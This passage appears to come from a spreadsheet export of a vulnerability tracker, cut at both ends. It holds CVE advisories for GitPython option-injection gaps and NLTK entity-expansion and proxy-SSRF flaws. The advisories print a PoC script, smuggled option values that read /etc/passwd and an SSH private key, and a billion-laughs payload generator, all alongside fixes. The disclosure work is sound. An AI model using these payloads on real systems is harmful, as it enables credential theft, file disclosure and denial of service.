```</t></is></c><c r="T34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D35" s="5" t="inlineStr" /><c r="E35" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.004</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr" /><c r="K35" s="5" t="inlineStr" /><c r="L35" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M35" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N35" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q35" s="5" t="inlineStr" /><c r="R35" s="5" t="inlineStr" /><c r="S35" s="5" t="inlineStr"><is><t>- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the "escapes intended base directory" sense)
- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).

`git clone` also accepts `--separate-git-dir=&lt;path&gt;`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: &lt;path&gt;`) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *"Redirects the repository metadata to a caller-controlled path"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:

```
:param allow_unsafe_options:
    Allow unsafe options to be used, such as ``--template`` and
    ``--separate-git-dir``.
```

i.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:

```python
unsafe_git_clone_options = [
    "--upload-pack",
    "-u",
    "--config",
    "-c",
    "--template",
    "--bundle-uri",
]
```

So any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.

## Root cause
Parity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same "denylist omits an equally-dangerous sibling option" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).

## Exploit path
1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `"separate-git-dir"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.
2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.
3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=&lt;attacker path&gt;` and GitPython executes `git clone -v --separate-git-dir=&lt;attacker path&gt; -- &lt;url&gt; &lt;dest&gt;` via `subprocess` (no shell).
4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.

## Impact
Arbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` ("Arbitrary Git Repository Creation Outside the Working Tree", CVSS 8.2). Concretely:
- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.
- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.
- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.

## Preconditions
- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.
- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.

## Evidence
- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `"--separate-git-dir"` with the comment "Redirects the repository metadata to a caller-controlled path".
- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `"--separate-git-dir"`.
- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.
- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.
- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.

## False-positive check (adversarial re-read)
- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).
- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.
- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.
- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.
- Verdict: no concrete blocker found. **CONFIRMED.**

## Remediation
Add `"--separate-git-dir"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.

## Confidence
High. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.


## Proof-of-Concept source (`gitpython-001-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in
unsafe_git_clone_options, so it reaches `git clone` unguarded and writes a
full git directory (config, hooks/, objects/, refs/, ...) to an
attacker-controlled path OUTSIDE the intended destination directory, with
allow_unsafe_options left at its default of False.

Run against the GitPython source tree under test, e.g.:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-001-poc.py &lt;workdir&gt;

Benign: only writes/reads inside the given workdir. No destructive/exfiltrating
payload. Exits non-zero and prints "NOT VULNERABLE" if the guard blocks the option
or the write does not escape the destination directory.
"""
import os
import sys
import subprocess


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-001-poc"
    src = os.path.join(workdir, "src")
    dest = os.path.join(workdir, "dest")
    sentinel_dir = os.path.join(workdir, "OUTSIDE_SENTINEL")
    target_gitdir = os.path.join(sentinel_dir, "redirected.git")

    for p in (src, dest, sentinel_dir):
        os.makedirs(p, exist_ok=True)

    # Minimal benign source repo to clone from.
    subprocess.run(["git", "init", "-q", "-b", "main", src], check=True)
    subprocess.run(["git", "-C", src, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", src, "config", "user.name", "Test"], check=True)
    with open(os.path.join(src, "file.txt"), "w") as f:
        f.write("hello\n")
    subprocess.run(["git", "-C", src, "add", "file.txt"], check=True)
    subprocess.run(["git", "-C", src, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test

    print("unsafe_git_clone_options =", git.Repo.unsafe_git_clone_options)
    assert "--separate-git-dir" not in git.Repo.unsafe_git_clone_options, (
        "guard now includes --separate-git-dir; PoC no longer applicable, target patched"
    )

    try:
        repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)
    except git.exc.UnsafeOptionError as e:
        print("NOT VULNERABLE: blocked by UnsafeOptionError:", e)
        sys.exit(1)

    wrote_outside = os.path.isdir(os.path.join(target_gitdir, "hooks")) and os.path.isfile(
        os.path.join(target_gitdir, "config")
    )
    gitlink_points_outside = False
    with open(os.path.join(dest, ".git")) as f:
        gitlink = f.read().strip()
        gitlink_points_outside = target_gitdir in gitlink

    print("repo.git_dir =", repo.git_dir)
    print("wrote git directory outside dest (sentinel) =", wrote_outside)
    print("dest/.git gitlink points outside dest =", gitlink_points_outside)

    if wrote_outside and gitlink_points_outside:
        print("VULNERABLE: git directory created at attacker-controlled path "
              f"outside the clone destination: {target_gitdir}")
        sys.exit(0)
    else:
        print("NOT VULNERABLE: sentinel not observed")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D36" s="5" t="inlineStr" /><c r="E36" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.002</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M36" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N36" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q36" s="5" t="inlineStr" /><c r="R36" s="5" t="inlineStr" /><c r="S36" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D37" s="5" t="inlineStr" /><c r="E37" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.002</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M37" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N37" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P37" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q37" s="5" t="inlineStr" /><c r="R37" s="5" t="inlineStr" /><c r="S37" s="5" t="inlineStr"><is><t>## Summary
`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).

## Root Cause
The fix `3af0c251` added `unsafe_git_tag_options = ["--file","-F"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference="--file=&lt;path&gt;"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.

## Impact
Arbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
from git import TagReference
t = TagReference.create(repo, "vpwn", reference="--file=/home/app/.ssh/id_rsa")
print(t.tag.message)   # contents of the file
```

## Attack Chain
1. Entry: app calls `TagReference.create(repo, name, reference=&lt;user&gt;)` with `reference="--file=/home/app/.ssh/id_rsa"`.
2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), ["--file","-F"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file="…"` IS blocked; only the positional escapes).
3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=&lt;secret&gt;']`.
4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).

## Bypass Evidence
Independently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=&lt;secret&gt;')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='&lt;secret&gt;')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).

## Affected Versions
`GitPython &lt;= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).

## Suggested Fix
Include the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D38" s="5" t="inlineStr" /><c r="E38" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.003</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M38" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N38" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q38" s="5" t="inlineStr" /><c r="R38" s="5" t="inlineStr" /><c r="S38" s="5" t="inlineStr"><is><t>Several XML parsing sites in NLTK still used `xml.etree.ElementTree` directly, which honours `&lt;!ENTITY&gt;` declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.

Affected call sites (&lt;= 3.10.2):
- `nltk.chunk.named_entity.load_ace_file` — parses ACE annotation XML
- `nltk.internals.ElementWrapper` — converts any given string to an Element
- `nltk.downloader` — `Package.fromxml`, `Collection.fromxml`, `_find_collections`, `_find_packages`

libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.

This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new `nltk.xmlsec` module that refuses entity declarations, preferring `defusedxml` and falling back to a standard-library `xml.parsers.expat` pre-scan when defusedxml is absent.

---

## Attack demonstration

Reproducible PoC against a real affected entry point (`nltk.internals.ElementWrapper`). Every number below is captured output, not illustrative.

### 1. The amplification (vulnerable path: raw `xml.etree.ElementTree`)

A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:

| levels | input bytes | expanded bytes | factor |
|--------|-------------|----------------|--------|
| 3 | 218 | 10,000 | x45 |
| 4 | 274 | 100,000 | x364 |
| 5 | 330 | 1,000,000 | x3,030 |
| 6 | 386 | (libexpat 2.7.1 cap trips) | - |

The level-6 cap is **libexpat's**, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.

```python
import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'&lt;!ENTITY e{i} "{("&amp;e%d;"%(i-1))*10}"&gt;' for i in range(1, levels+1))
    return f'&lt;!DOCTYPE d [&lt;!ENTITY e0 "AAAAAAAAAA"&gt;{d}]&gt;&lt;d&gt;&amp;e{levels};&lt;/d&gt;'
ET.fromstring(bomb(5))   # -&gt; element whose .text is 1,000,000 chars
```

### 2. The patched entry point rejects it

```
&gt;&gt;&gt; from nltk.internals import ElementWrapper
&gt;&gt;&gt; ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)
```

### 3. Why a text-based screen is not enough

An entity declaration can hide behind a decoy `&lt;!DOCTYPE&gt;` in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:

```python
evil = '&lt;!-- &lt;!DOCTYPE x [ ] &gt; --&gt;&lt;!DOCTYPE d [&lt;!ENTITY a "PPPP..."&gt;]&gt;&lt;d&gt;&amp;a;&lt;/d&gt;'
```

```
raw ElementTree -&gt; EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -&gt; REJECTED (EntitiesForbidden)
```

An earlier draft of the fallback that walked the text **was** bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray `]` inside a PI in the internal subset). All five are now regression tests.

### 4. Both back ends block it

`nltk.xmlsec` prefers `defusedxml` and falls back to a stdlib `xml.parsers.expat` pre-scan. Same payloads, defusedxml hidden to force the fallback:

```
stdlib fallback | billion-laughs               -&gt; REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -&gt; REJECTED (EntitiesForbidden)
```

Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).</t></is></c><c r="T38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D39" s="5" t="inlineStr" /><c r="E39" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.003</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M39" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N39" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q39" s="5" t="inlineStr" /><c r="R39" s="5" t="inlineStr" /><c r="S39" s="5" t="inlineStr"><is><t>### Summary

Current NLTK source reopens SSRF in proxied environments. `pathsec.urlopen()` validates the requested hostname locally, but once proxy inheritance is enabled the real fetch is performed by the proxy rather than by the validated direct-connect socket path.

### Details

- **Vulnerability type:** Server-side request forgery
- **Affected component:** `nltk.pathsec.urlopen`, `nltk.data.load`, `nltk.downloader.Downloader.index`, `nltk.downloader.Downloader.download`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was a negative control and did not reproduce.
- **Patched versions:** Not yet patched
- **Root cause:** Proxy-handler inheritance disables `_SafeHTTPHandler` and `_SafeHTTPSHandler`, so the validated hostname no longer matches the actual egress destination.

The hardened direct path pins the validated numeric destination IP before opening the socket. The proxied branch instead copies `ProxyHandler` instances from the global opener, marks the request as proxied, and skips the pinned handlers. I confirmed that a validated public URL can be fetched from a loopback-only internal service through the proxy path via `pathsec.urlopen()`, `nltk.data.load()`, `Downloader.index()`, and `Downloader.download()`.

### PoC

**Preconditions**
- The runtime has an HTTP proxy configured and the caller relies on `pathsec` to keep network fetches SSRF-safe.

**Steps**
1. Start a loopback-only HTTP server that serves secret text, a valid downloader index, and a ZIP payload.
2. Configure a proxy that forwards a validated public URL to that internal loopback service.
3. Call `pathsec.urlopen()` or `nltk.data.load()` on the public URL and observe the internal response is returned.
4. Instantiate `Downloader(server_index_url=...)`, call `index()` and `download()`, and observe internal-only content is parsed and installed.

**Minimal reproducible excerpt**

```text
{'urlopen': 'PROXY_TEXT_SECRET', 'data_load': 'PROXY_TEXT_SECRET', 'downloaded_file': 'INTERNAL_ZIP_SECRET'}
```

### Impact

Consumers that trust `pathsec` as an SSRF barrier in proxied environments can be made to read internal-only HTTP resources, load forged downloader indexes, and install attacker-chosen package content fetched from the proxy's network view.

### Remediation

Preserve destination validation for the actual proxy egress target or fail closed when the request would otherwise downgrade into an unpinned proxied path. Add regression tests across `pathsec.urlopen`, `nltk.data.load`, and downloader fetches with a configured proxy.

### References

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L468-L518
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/data.py#L1247-L1283
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L875-L889
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/downloader.py#L1220-L1226
- https://github.com/nltk/nltk/blob/3.9.4/nltk/pathsec.py#L245-L250

---

## Fix + attack demonstration (verified)


NLTK cannot pin the egress through a proxy, so it stops pretending to: under `ENFORCE` a proxied fetch is **refused** rather than performed unvalidated. Operators who trust their proxy opt back in with `NLTK_ALLOW_PROXIED_URLOPEN=1` or `nltk.pathsec.ALLOW_PROXIED_FETCH=True`; under `ENFORCE=False` the refusal degrades to a warning. This closes the **whole class** (environment proxies and explicit `ProxyHandler` alike), because NLTK declines any fetch whose egress it cannot validate.

## Attack demonstration (reproduced; captured output)
A loopback HTTP server stands in for the internal target; `http_proxy` points at it; NLTK is asked for a **public** IP URL.

**Before the fix** — the internal secret is exfiltrated through the proxy:
```
validate_network_url(public): PASSED
*** BYPASS: pathsec.urlopen returned INTERNAL content via proxy: 'INTERNAL_ONLY_SECRET'
```

**After the fix** — five scenarios, isolated subprocesses:
| Scenario | Result |
|---|---|
| proxied (env) + ENFORCE | `PermissionError` — **blocked** |
| proxied + opt-in | returns secret — escape hatch works |
| explicit `ProxyHandler` (not env) + ENFORCE | `PermissionError` — **blocked** (whole class) |
| no proxy (direct) | internal IP still refused — pinning intact |
| proxied + `ENFORCE=False` | returns secret **+ warns** |

## Tests
`nltk/test/unit/test_pathsec.py`: 64 passed. Added an end-to-end regression (`test_proxied_fetch_does_not_reach_internal_target`) plus `test_env_proxy_fails_closed_under_enforce`; the prior `test_env_proxy_skips_pinning_handlers` (which encoded the vulnerable path) is re-expressed as the opt-in case. Existing direct-path DNS-rebinding and IP-policy tests unchanged and passing. pre-commit (isort/black/ruff) clean.

## Note
